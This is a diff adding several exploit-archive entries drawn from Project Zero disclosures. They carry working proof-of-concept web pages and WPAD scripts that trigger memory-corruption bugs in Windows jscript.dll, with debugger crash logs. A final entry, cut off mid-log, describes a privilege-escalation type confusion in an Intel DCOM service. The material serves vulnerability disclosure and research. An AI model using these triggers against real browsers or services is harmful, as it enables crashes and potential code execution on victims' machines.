- An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service.
- The issue can also be exploited by opening a malicious web page in Internet Explorer. In this case, due to the sizes involved, a 64-bit tab process would most likely be required to trigger the issue. This is going to be the case for example when running IE in the Enhanced Protected Mode.
The issue has been verified on 64-bit Win7 and 64-bit Win10 with the most recent patches applied.
PoC for Internet Explorer:
============================================
-->
<!-- saved from url=(0014)about:internet -->
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
</head>
<body>
<script language="Jscript.Encode">
var s = 'a';
for(var i=0;i<28;i++) {
s = s+s;
}
s = s+'[a-z]'+s;
r = new RegExp();
r.compile(s);
</script>
</body>
</html>
<!--
============================================
PoC for WPAD:
============================================
function FindProxyForURL(url, host) {
var s = 'a';
for(var i=0;i<28;i++) {
s = s+s;
}
s = s+'[a-z]'+s;
r = new RegExp();
r.compile(s);
return "DIRECT";
}
===========================================
Technical details:
The issue is in RegExpComp::Compile (and several functions called from RegExpComp::Compile). RegExpComp::Compile is responsible for compiling a RegExp object. It maintains a buffer with the compilation result and extends it when necessary. Extending the buffer is handled using RegExpBase::EnsureSpace which looks (approximately) like:
void RegExpBase::EnsureSpace(int desired_size) {
if(desired_size > buffer_size) {
if(2 * desired_size < desired_size) {
//throw an exception
}
int new_size = 2 * desired_size;
char * new_buffer = realloc(buffer, new_size);
if(!new_buffer) {
//throw an exception
}
buffer = new_buffer;
buffer_size = new_size;
}
}
Note that desired_size is a signed 32-bit integer. RegExpBase::EnsureSpace has an integer overflow check, however if an overflow happens in the caller (a caller must add the size which it wants to append to the existing content size) and desired_size becomes negative, RegExpBase::EnsureSpace would simply return because of the first if() statement without attempting to extend the buffer.
Indeed, integer overflows can happen in the several callers of RegExpBase::EnsureSpace. The one being triggered in the PoC is in RegExpComp::Compile, when it attempts to append the raw input string to the buffer towards the end of the compilation process.
Debug log (from IE, but it looks similar in the WPAD service):
============================================
(b90.698): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
msvcrt!memcpy+0x1d9:
000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=????
0:012> r
rax=0000000040000061 rbx=00000000042b7ea0 rcx=000000025bb60fe0
rdx=fffffffdfa4b0010 rsi=00000000042b5f48 rdi=000000004000000a
rip=000007fefefe123d rsp=0000000012399ef8 rbp=0000000012399f28
r8=0000000040000008 r9=0000000000000000 r10=6100610061006100
r11=000000021bb60fd8 r12=0000000016010fe8 r13=000007feebc91670
r14=0000000020000001 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
msvcrt!memcpy+0x1d9:
000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=????
0:012> k
# Child-SP RetAddr Call Site
00 00000000`12399ef8 000007fe`ebc88bb3 msvcrt!memcpy+0x1d9
01 00000000`12399f00 000007fe`ebcfacc2 jscript!RegExpComp::Compile+0x1b7
02 00000000`12399f60 000007fe`ebce2118 jscript!RegExpComp::CompileDynamic+0x62
03 00000000`12399fa0 000007fe`ebce3310 jscript!RegExpObj::Compile+0x32c
04 00000000`1239a0f0 000007fe`ebc7c2ec jscript!JsRegExpCompile+0x70
05 00000000`1239a140 000007fe`ebc7a9fe jscript!NatFncObj::Call+0x138
06 00000000`1239a1f0 000007fe`ebc7b234 jscript!NameTbl::InvokeInternal+0x3f8
07 00000000`1239a310 000007fe`ebc79852 jscript!VAR::InvokeByName+0x81c
08 00000000`1239a520 000007fe`ebc79929 jscript!VAR::InvokeDispName+0x72
09 00000000`1239a5a0 000007fe`ebc724b8 jscript!VAR::InvokeByDispID+0x1229
0a 00000000`1239a5f0 000007fe`ebc78ec2 jscript!CScriptRuntime::Run+0x5a6
0b 00000000`1239b3f0 000007fe`ebc78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
0c 00000000`1239b600 000007fe`ebc78b95 jscript!ScrFncObj::Call+0xb7
0d 00000000`1239b6a0 000007fe`ebc7e6c0 jscript!CSession::Execute+0x19e
0e 00000000`1239b770 000007fe`ebc870e7 jscript!COleScript::ExecutePendingScripts+0x17a
0f 00000000`1239b840 000007fe`ebc868d6 jscript!COleScript::ParseScriptTextCore+0x267
10 00000000`1239b930 000007fe`ecdf5251 jscript!COleScript::ParseScriptText+0x56
11 00000000`1239b990 000007fe`ed57b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
12 00000000`1239ba10 000007fe`ecdf6256 MSHTML!CScriptCollection::ParseScriptText+0x37f
13 00000000`1239baf0 000007fe`ecdf5c8e MSHTML!CScriptData::CommitCode+0x3d9
14 00000000`1239bcc0 000007fe`ecdf5a11 MSHTML!CScriptData::Execute+0x283
15 00000000`1239bd80 000007fe`ed5b46fb MSHTML!CHtmScriptParseCtx::Execute+0x101
16 00000000`1239bdc0 000007fe`ece98a5b MSHTML!CHtmParseBase::Execute+0x235
17 00000000`1239be60 000007fe`ecd72e39 MSHTML!CHtmPost::Broadcast+0x90
18 00000000`1239bea0 000007fe`ecdccaef MSHTML!CHtmPost::Exec+0x4bb
19 00000000`1239c0b0 000007fe`ecdcca40 MSHTML!CHtmPost::Run+0x3f
1a 00000000`1239c0e0 000007fe`ecdcda12 MSHTML!PostManExecute+0x70
1b 00000000`1239c160 000007fe`ecdd0843 MSHTML!PostManResume+0xa1
1c 00000000`1239c1a0 000007fe`ecdb6fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
1d 00000000`1239c1f0 000007fe`ed5e4f78 MSHTML!CDwnChan::OnMethodCall+0x41
1e 00000000`1239c220 000007fe`eccd9d75 MSHTML!GlobalWndOnMethodCall+0x240
1f 00000000`1239c2c0 00000000`77229bbd MSHTML!GlobalWndProc+0x150
20 00000000`1239c340 00000000`772298c2 USER32!UserCallWinProcCheckWow+0x1ad
21 00000000`1239c400 000007fe`f29d4a87 USER32!DispatchMessageWorker+0x3b5
22 00000000`1239c480 000007fe`f29dbabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
23 00000000`1239f700 000007fe`fd73572f IEFRAME!LCIETab_ThreadProc+0x3a3
24 00000000`1239f830 000007fe`ee62925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
25 00000000`1239f860 00000000`773259cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
26 00000000`1239f8b0 00000000`7745a561 kernel32!BaseThreadInitThunk+0xd
27 00000000`1239f8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
============================================
-->

117
exploits/windows/dos/43370.html Normal file
View file

@ -0,0 +1,117 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1383
There is an heap overflow vulnerability in jscript.dll library (used in IE, WPAD and other places). The bug affects 2 functions, JsArrayStringHeapSort and JsArrayFunctionHeapSort.
PoC for IE (note: page heap might be required to obsorve the crash):
=========================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
var vars = new Array(100);
var arr = new Array(1000);
for(var i=1;i<600;i++) arr[i] = i;
var o = {toString:function() {
for(var i=600;i<1000;i++) {
arr[i] = 1337;
}
}}
function go() {
arr[0] = o;
Array.prototype.sort.call(arr);
}
go();
</script>
<!--
=========================================
Technical details:
Array.sort is implemented in JsArraySort which, depending if a comparison function was specified or not, calls JsArrayStringHeapSort or JsArrayFunctionHeapSort. These (vulnerable) functions take several arguments, 2 of which are the input array length and the number of elements currently in the input array (this can be smaller than the array length). The vulnerable functions are going to allcoate 2 buffers to store intermediate data. The size of these buffers will be calculated based on *num_elements*. However, while filling those arrays it is possible that the number of elements is going to increase, which causes a heap overflow.
Debug log:
=========================================
0:023> g
(e5c.988): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!NameTbl::GetValCore+0x30:
000007fe`f4f59df0 498900 mov qword ptr [r8],rax ds:00000000`04603010=????????????????
0:013> r
rax=c0c0c0c0c0c00003 rbx=000000000443cf20 rcx=000000000441df90
rdx=0000000000000003 rsi=0000000004603010 rdi=000000000441df90
rip=000007fef4f59df0 rsp=00000000129a8e10 rbp=0000000000000000
r8=0000000004603010 r9=000000000441fdc8 r10=00000000040a9800
r11=00000000129a8e70 r12=0000000003ecb690 r13=0000000000000001
r14=0000000004603010 r15=0000000000000259
iopl=0 nv up ei ng nz na pe cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010283
jscript!NameTbl::GetValCore+0x30:
000007fe`f4f59df0 498900 mov qword ptr [r8],rax ds:00000000`04603010=????????????????
0:013> k
# Child-SP RetAddr Call Site
00 00000000`129a8e10 000007fe`f4f75f0e jscript!NameTbl::GetValCore+0x30
01 00000000`129a8e70 000007fe`f4f761d8 jscript!ArrayObj::GetValAtIndex+0x62
02 00000000`129a8eb0 000007fe`f4fbd5a2 jscript!ArrayObj::GetVal+0x28
03 00000000`129a8f40 000007fe`f4fbcd90 jscript!JsArrayStringHeapSort+0x1a6
04 00000000`129a90d0 000007fe`f4f5c2ec jscript!JsArraySort+0x270
05 00000000`129a9180 000007fe`f4f5a9fe jscript!NatFncObj::Call+0x138
06 00000000`129a9230 000007fe`f4f586ea jscript!NameTbl::InvokeInternal+0x3f8
07 00000000`129a9350 000007fe`f4fadd72 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
08 00000000`129a93a0 000007fe`f4f5c2ec jscript!JsFncCall+0xc2
09 00000000`129a9430 000007fe`f4f5a9fe jscript!NatFncObj::Call+0x138
0a 00000000`129a94e0 000007fe`f4f5b234 jscript!NameTbl::InvokeInternal+0x3f8
0b 00000000`129a9600 000007fe`f4f59852 jscript!VAR::InvokeByName+0x81c
0c 00000000`129a9810 000007fe`f4f59929 jscript!VAR::InvokeDispName+0x72
0d 00000000`129a9890 000007fe`f4f524b8 jscript!VAR::InvokeByDispID+0x1229
0e 00000000`129a98e0 000007fe`f4f58ec2 jscript!CScriptRuntime::Run+0x5a6
0f 00000000`129aa6e0 000007fe`f4f594b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162
10 00000000`129aa8f0 000007fe`f4f586ea jscript!NameTbl::InvokeInternal+0x2d3
11 00000000`129aaa10 000007fe`f4f524b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
12 00000000`129aaa60 000007fe`f4f58ec2 jscript!CScriptRuntime::Run+0x5a6
13 00000000`129ab860 000007fe`f4f58d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
14 00000000`129aba70 000007fe`f4f58b95 jscript!ScrFncObj::Call+0xb7
15 00000000`129abb10 000007fe`f4f5e6c0 jscript!CSession::Execute+0x19e
16 00000000`129abbe0 000007fe`f4f670e7 jscript!COleScript::ExecutePendingScripts+0x17a
17 00000000`129abcb0 000007fe`f4f668d6 jscript!COleScript::ParseScriptTextCore+0x267
18 00000000`129abda0 000007fe`ec595251 jscript!COleScript::ParseScriptText+0x56
19 00000000`129abe00 000007fe`ecd1b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
1a 00000000`129abe80 000007fe`ec596256 MSHTML!CScriptCollection::ParseScriptText+0x37f
1b 00000000`129abf60 000007fe`ec595c8e MSHTML!CScriptData::CommitCode+0x3d9
1c 00000000`129ac130 000007fe`ec595a11 MSHTML!CScriptData::Execute+0x283
1d 00000000`129ac1f0 000007fe`ecd546fb MSHTML!CHtmScriptParseCtx::Execute+0x101
1e 00000000`129ac230 000007fe`ec638a5b MSHTML!CHtmParseBase::Execute+0x235
1f 00000000`129ac2d0 000007fe`ec512e39 MSHTML!CHtmPost::Broadcast+0x90
20 00000000`129ac310 000007fe`ec56caef MSHTML!CHtmPost::Exec+0x4bb
21 00000000`129ac520 000007fe`ec56ca40 MSHTML!CHtmPost::Run+0x3f
22 00000000`129ac550 000007fe`ec56da12 MSHTML!PostManExecute+0x70
23 00000000`129ac5d0 000007fe`ec570843 MSHTML!PostManResume+0xa1
24 00000000`129ac610 000007fe`ec556fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
25 00000000`129ac660 000007fe`ecd84f78 MSHTML!CDwnChan::OnMethodCall+0x41
26 00000000`129ac690 000007fe`ec479d75 MSHTML!GlobalWndOnMethodCall+0x240
27 00000000`129ac730 00000000`76d19bbd MSHTML!GlobalWndProc+0x150
28 00000000`129ac7b0 00000000`76d198c2 USER32!UserCallWinProcCheckWow+0x1ad
29 00000000`129ac870 000007fe`f11a4a87 USER32!DispatchMessageWorker+0x3b5
2a 00000000`129ac8f0 000007fe`f11ababb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
2b 00000000`129afb70 000007fe`fd48572f IEFRAME!LCIETab_ThreadProc+0x3a3
2c 00000000`129afca0 000007fe`f521925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
2d 00000000`129afcd0 00000000`76e159cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
2e 00000000`129afd20 00000000`76f4a561 kernel32!BaseThreadInitThunk+0xd
2f 00000000`129afd50 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
=========================================
-->

138
exploits/windows/dos/43371.html Normal file
View file

@ -0,0 +1,138 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1378
There is an uninitialized variable vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:
- By opening a malicious web page in Internet Explorer.
- [currently untested] An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim.
The issue has been verified on 64-bit Windows 10 with the most recent patches applied.
PoC for Internet Explorer (tested on IE 11 with a 64-bit tab process. Might no work very reliably due to the nature of the issue, please see the technical details below):
============================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
var x = new URIError(new Array(), undefined, undefined);
String.prototype.localeCompare.call(x, new Date(0, 0, 0, 0, 0, 0, undefined));
Array.prototype.slice.call(1);
</script>
<!--
============================================
Technical details:
The issue is in jscript!JsArraySlice (Array.prototype.slice.call in the PoC above, all other lines are just fuzzer generated junk that puts the stack into a 'correct' state needed to demonstrate the issue).
JsArraySlice looks approximately like:
int JsArraySlice(CSession *session, VAR *this, VAR *ret, int num_args, VAR *args) {
VAR object;
VAR length;
NameTbl *nametable;
if(!ConvertToObject(session, this, &object, 0)) {
//set error and return
}
if(!IsJSObject(&object, &nametable)) {
//set error and return
}
if(nametable->GetVal(&g_sym_length, &length) < 0) {
//set error and return
}
if(length->type != TYPE_INT) {
ConvertToScalar(session, &length, &length, 3, 1);
}
...
}
The issue is that JsArraySlice() expects NameTBL::GetVal() to return an integer <0 if the input object does not contain the 'length' property. However in this case NameTBL::GetVal() will actually return 1. Also, in this case, the length VAR is *not* going to be initialized. Thus if NameTBL::GetVal() returns 1, ConvertToScalar() is going to be called with invalid arguments. Depending on the perceived (uninitialized) type of length VAR, this might lead to exploitable conditions including calling a virtual method on the uninitialized pointer (see below).
Debug log:
============================================
(a3c.bd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????
0:014> r
rax=0000004e0061004e rbx=000000f42f0fb400 rcx=00007ffae4630904
rdx=0000000000000081 rsi=0000000000000002 rdi=00007ffae4630904
rip=00007ffae45a45fd rsp=000000f42f0fb1e0 rbp=000000f42f0fb2e0
r8=000000f42f0fb230 r9=000000f42f0fb2a0 r10=0000000000000080
r11=5555555511140000 r12=0000000000000000 r13=0000000000000000
r14=000002a7533c5a70 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????
0:014> k
# Child-SP RetAddr Call Site
00 000000f4`2f0fb1e0 00007ffa`e45b548f jscript!InvokeDispatch+0xbd
01 000000f4`2f0fb380 00007ffa`e45adc2d jscript!AutBlock::AddRef+0x101f
02 000000f4`2f0fb3d0 00007ffa`e45e048f jscript!ConvertToScalar+0x51
03 000000f4`2f0fb440 00007ffa`e458265a jscript!JsArraySlice+0x10f
04 000000f4`2f0fb540 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a
05 000000f4`2f0fb5f0 00007ffa`e458d75b jscript!NameTbl::InvokeInternal+0x135
06 000000f4`2f0fb6b0 00007ffa`e45d4d80 jscript!VAR::InvokeByDispID+0x87
07 000000f4`2f0fb700 00007ffa`e458265a jscript!JsFncCall+0xb0
08 000000f4`2f0fb780 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a
09 000000f4`2f0fb830 00007ffa`e458cce0 jscript!NameTbl::InvokeInternal+0x135
0a 000000f4`2f0fb8f0 00007ffa`e45a7f18 jscript!VAR::InvokeByName+0x580
0b 000000f4`2f0fbaf0 00007ffa`e45b562b jscript!VAR::InvokeDispName+0x60
0c 000000f4`2f0fbb70 00007ffa`e4594ccf jscript!AutBlock::AddRef+0x11bb
0d 000000f4`2f0fbbc0 00007ffa`e45972cd jscript!CScriptRuntime::Run+0x665f
0e 000000f4`2f0fc520 00007ffa`e4597428 jscript!ScrFncObj::CallWithFrameOnStack+0x15d
0f 000000f4`2f0fc720 00007ffa`e4588b15 jscript!ScrFncObj::Call+0xb8
10 000000f4`2f0fc7c0 00007ffa`e45861eb jscript!CSession::Execute+0x265
11 000000f4`2f0fc920 00007ffa`e4586929 jscript!COleScript::ExecutePendingScripts+0x28b
12 000000f4`2f0fca00 00007ffa`e4586a06 jscript!COleScript::ParseScriptTextCore+0x239
13 000000f4`2f0fcaf0 00007ffa`ae439138 jscript!COleScript::ParseScriptText+0x56
14 000000f4`2f0fcb50 00007ffa`ae4f8f7d MSHTML!CActiveScriptHolder::ParseScriptText+0xb8
15 000000f4`2f0fcbd0 00007ffa`ae4f827c MSHTML!CScriptCollection::ParseScriptText+0x26d
16 000000f4`2f0fccb0 00007ffa`ae465a63 MSHTML!CScriptData::CommitCode+0x3b4
17 000000f4`2f0fce80 00007ffa`ae4657df MSHTML!CScriptData::Execute+0x267
18 000000f4`2f0fcf40 00007ffa`ae357ea1 MSHTML!CHtmScriptParseCtx::Execute+0xbf
19 000000f4`2f0fcf70 00007ffa`ae3b8880 MSHTML!CHtmParseBase::Execute+0x181
1a 000000f4`2f0fd000 00007ffa`ae3b846a MSHTML!CHtmPost::Broadcast+0x50
1b 000000f4`2f0fd040 00007ffa`ae467fae MSHTML!CHtmPost::Exec+0x39a
1c 000000f4`2f0fd240 00007ffa`ae469324 MSHTML!CHtmPost::Run+0x32
1d 000000f4`2f0fd270 00007ffa`ae463b99 MSHTML!PostManExecute+0x70
1e 000000f4`2f0fd2f0 00007ffa`ae463a60 MSHTML!PostManResume+0xa1
1f 000000f4`2f0fd330 00007ffa`ae44523c MSHTML!CHtmPost::OnDwnChanCallback+0x40
20 000000f4`2f0fd380 00007ffa`ae386e21 MSHTML!CDwnChan::OnMethodCall+0x1c
21 000000f4`2f0fd3b0 00007ffa`ae3adcb9 MSHTML!GlobalWndOnMethodCall+0x251
22 000000f4`2f0fd460 00007ffa`f1f61c24 MSHTML!GlobalWndProc+0xf9
23 000000f4`2f0fd4f0 00007ffa`f1f6156c USER32!UserCallWinProcCheckWow+0x274
24 000000f4`2f0fd650 00007ffa`afa629f7 USER32!DispatchMessageWorker+0x1ac
25 000000f4`2f0fd6d0 00007ffa`afa9ed04 IEFRAME!CTabWindow::_TabWindowThreadProc+0x5e7
26 000000f4`2f0ff920 00007ffa`e42c9586 IEFRAME!LCIETab_ThreadProc+0x3a4
27 000000f4`2f0ffa50 00007ffa`c8b92ed9 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16
28 000000f4`2f0ffa80 00007ffa`f2268364 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x89
29 000000f4`2f0ffad0 00007ffa`f43e7091 KERNEL32!BaseThreadInitThunk+0x14
2a 000000f4`2f0ffb00 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:014> u rip
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8]
00007ffa`e45a4601 ff15c14d0700 call qword ptr [jscript!_guard_dispatch_icall_fptr (00007ffa`e46193c8)]
00007ffa`e45a4607 488d442458 lea rax,[rsp+58h]
00007ffa`e45a460c 458bc4 mov r8d,r12d
00007ffa`e45a460f 4889442448 mov qword ptr [rsp+48h],rax
00007ffa`e45a4614 488bd7 mov rdx,rdi
00007ffa`e45a4617 488d4580 lea rax,[rbp-80h]
00007ffa`e45a461b 498bce mov rcx,r14
============================================
-->

91
exploits/windows/dos/43372.html Normal file
View file

@ -0,0 +1,91 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1382
There is an out-of-bounds read in jscript.dll library (used in IE, WPAD and other places):
PoC for IE (note: page heap might be required to obsorve the crash):
=========================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
function go() {
var r= new RegExp(Array(100).join('()'));
''.search(r);
alert(RegExp.lastParen);
}
go();
</script>
<!--
=========================================
Debug log:
=========================================
(cec.a14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!RegExpFncObj::LastParen+0x43:
000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????
0:014> r
rax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063
rdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0
rip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148
r8=00000000130f9210 r9=0000000000000000 r10=000000000463fef0
r11=000000000463ff38 r12=0000000000000083 r13=0000000000000000
r14=00000000130f9210 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
jscript!RegExpFncObj::LastParen+0x43:
000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????
0:014> k
# Child-SP RetAddr Call Site
00 00000000`130f9090 000007fe`f2385e6d jscript!RegExpFncObj::LastParen+0x43
01 00000000`130f90e0 000007fe`f236b293 jscript!NameTbl::GetVal+0x3d5
02 00000000`130f9170 000007fe`f2369d27 jscript!VAR::InvokeByName+0x873
03 00000000`130f9380 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x373
04 00000000`130fa180 000007fe`f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162
05 00000000`130fa390 000007fe`f23686ea jscript!NameTbl::InvokeInternal+0x2d3
06 00000000`130fa4b0 000007fe`f23624b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
07 00000000`130fa500 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x5a6
08 00000000`130fb300 000007fe`f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
09 00000000`130fb510 000007fe`f2368b95 jscript!ScrFncObj::Call+0xb7
0a 00000000`130fb5b0 000007fe`f236e6c0 jscript!CSession::Execute+0x19e
0b 00000000`130fb680 000007fe`f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a
0c 00000000`130fb750 000007fe`f23768d6 jscript!COleScript::ParseScriptTextCore+0x267
0d 00000000`130fb840 000007fe`e9a85251 jscript!COleScript::ParseScriptText+0x56
0e 00000000`130fb8a0 000007fe`ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
0f 00000000`130fb920 000007fe`e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f
10 00000000`130fba00 000007fe`e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9
11 00000000`130fbbd0 000007fe`e9a85a11 MSHTML!CScriptData::Execute+0x283
12 00000000`130fbc90 000007fe`ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101
13 00000000`130fbcd0 000007fe`e9b28a5b MSHTML!CHtmParseBase::Execute+0x235
14 00000000`130fbd70 000007fe`e9a02e39 MSHTML!CHtmPost::Broadcast+0x90
15 00000000`130fbdb0 000007fe`e9a5caef MSHTML!CHtmPost::Exec+0x4bb
16 00000000`130fbfc0 000007fe`e9a5ca40 MSHTML!CHtmPost::Run+0x3f
17 00000000`130fbff0 000007fe`e9a5da12 MSHTML!PostManExecute+0x70
18 00000000`130fc070 000007fe`e9a60843 MSHTML!PostManResume+0xa1
19 00000000`130fc0b0 000007fe`e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
1a 00000000`130fc100 000007fe`ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41
1b 00000000`130fc130 000007fe`e9969d75 MSHTML!GlobalWndOnMethodCall+0x240
1c 00000000`130fc1d0 00000000`771f9bbd MSHTML!GlobalWndProc+0x150
1d 00000000`130fc250 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad
1e 00000000`130fc310 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5
1f 00000000`130fc390 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
20 00000000`130ff610 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3
21 00000000`130ff740 000007fe`f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
22 00000000`130ff770 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
23 00000000`130ff7c0 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd
24 00000000`130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
=========================================
-->

93
exploits/windows/dos/43373.txt Normal file
View file

@ -0,0 +1,93 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1358
Intel Content Protection HECI Service Type Confusion EoP
Platform: Tested on Windows 10, service version 9.0.2.117
Class: Elevation of Privilege
Summary:
The Intel Content Protection HECI Service exposes a DCOM object to all users and most sandboxes (such as Edge LPAC and Chrome GPU). It has a type confusion vulnerability which can be used to elevate to SYSTEM privileges.
Description:
The Intel Content Protection HECI Service runs as LocalSystem and hosts a DCOM service. The main function is StartIo which takes an input variant and returns a variant. Based on what its trying to do Id assume the input variant is supposed to be a byte array, however it contains a bug.
The vulnerable code is roughly:
HRESULT StartIo(VARIANT In, VARIANT* Out) {
CComSafeArray<char> array;
array::CopyFrom(In.parray);
// Work with array
...
}
The issue here is that the In variant is used as a SAFEARRAY without checking that the VARIANT contains a SAFEARRAY. This leads to type confusion, for example a caller could pass VT_UI4 integer with any value they like and this code would interpret that integer as a pointer to a SAFEARRAY structure. This might seem to be only an arbitrary read issue, however the copy of the safe array can be made to execute arbitrary memory. If you point the type confused pointer at a block of memory which looks like a IUnknown array then when copying the array it will try and add a reference to each COM object in the array. This causes a VTable dispatch to AddRef which if carefully crafted should get arbitrary code execution.
The call to CopyFrom does verify that the variant type is VT_UI1 (a byte array) however you can set some feature flags such as FADF_UNKNOWN which will force a call to IUnknown::AddRef on the elements of the array without changing the supposed variant type. Also you dont need to guess the allocation address for the fake safearray as you can use a byte length BSTR which contains arbitrary data. The BSTR length field and the SAFEARRAY variant field lines up so as long as the lower 16 bits of the length is set to 17 (which is VT_UI1) it passes the checks and reads out the arbitrary contents from the allocated BSTR.
The really bad thing about this service is not only is it intentionally designed to be accessible from even a heavily restrictive sandbox such as Edge LPAC but it runs with full LocalSystem privileges. While on Win10 CFG might make it harder to exploit, on Win7 you dont have any such protection. Also the call is done inside an exception handler so even if the wrong address is chosen the service wont crash (except for fast fail such as CFG).
The following is an example crash when sending a fake safe array to the service (with just a dummy address of 0x18181818 as the IUnknown memory location).
(1110.1188): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=18181818 ebx=001e6290 ecx=18181818 edx=00209390 esi=11d41024 edi=18181818
eip=18181818 esp=0126efc4 ebp=0126efec iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
18181818 1818 sbb byte ptr [eax],bl ds:002b:18181818=18
0:003> k
# ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
00 0126efc0 74f740fb 0x18181818
01 0126efec 74f73e42 OLEAUT32!SafeArrayCopyData+0x21b
02 0126f018 010335d3 OLEAUT32!SafeArrayCopy+0x182
03 0126f030 01034e1b IntelCpHeciSvc+0x135d3
04 0126f118 750326e0 IntelCpHeciSvc+0x14e1b
05 0126f144 74ff4fc2 RPCRT4!Invoke+0x34
06 0126f598 7525555e RPCRT4!NdrStubCall2+0x452
07 0126f5e4 74f70706 combase!CStdStubBuffer_Invoke+0xde [onecore\com\combase\ndr\ndrole\stub.cxx @ 1449]
08 0126f614 75300c48 OLEAUT32!CUnivStubWrapper::Invoke+0x136
09 (Inline) -------- combase!InvokeStubWithExceptionPolicyAndTracing::__l6::<lambda_1ba7c1521bf8e7d0ebd8f0b3c0295667>::operator()+0x4e [onecore\com\combase\dcomrem\channelb.cxx @ 1824]
0a 0126f668 75303621 combase!ObjectMethodExceptionHandlingAction<<lambda_1ba7c1521bf8e7d0ebd8f0b3c0295667> >+0xa8 [onecore\com\combase\dcomrem\excepn.hxx @ 91]
